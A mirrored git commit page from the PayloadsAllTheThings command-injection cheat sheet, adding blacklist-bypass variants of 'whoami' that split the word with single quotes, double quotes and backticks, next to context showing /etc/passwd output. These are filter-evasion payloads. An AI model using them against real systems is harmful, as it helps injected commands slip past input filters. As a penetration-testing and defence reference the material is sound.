mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
bypass techniques added
This commit is contained in:
parent
dd2b68b70e
commit
033982dc30
1 changed files with 9 additions and 0 deletions
|
@ -18,6 +18,7 @@
|
|||
* [Bypass blacklisted words](#bypass-blacklisted-words)
|
||||
* [Bypass with single quote](#bypass-with-single-quote)
|
||||
* [Bypass with double quote](#bypass-with-double-quote)
|
||||
* [Bypass with backticks](#bypass-with-backticks)
|
||||
* [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
|
||||
* [Bypass with $@](#bypass-with-)
|
||||
* [Bypass with $()](#bypass-with--1)
|
||||
|
@ -245,12 +246,20 @@ root:x:0:0:root:/root:/bin/bash
|
|||
|
||||
```powershell
|
||||
w'h'o'am'i
|
||||
wh''oami
|
||||
```
|
||||
|
||||
#### Bypass with double quote
|
||||
|
||||
```powershell
|
||||
w"h"o"am"i
|
||||
wh""oami
|
||||
```
|
||||
|
||||
#### Bypass with backticks
|
||||
|
||||
```powershell
|
||||
wh``oami
|
||||
```
|
||||
|
||||
#### Bypass with backslash and slash
|
||||
|
|
Loading…
Reference in a new issue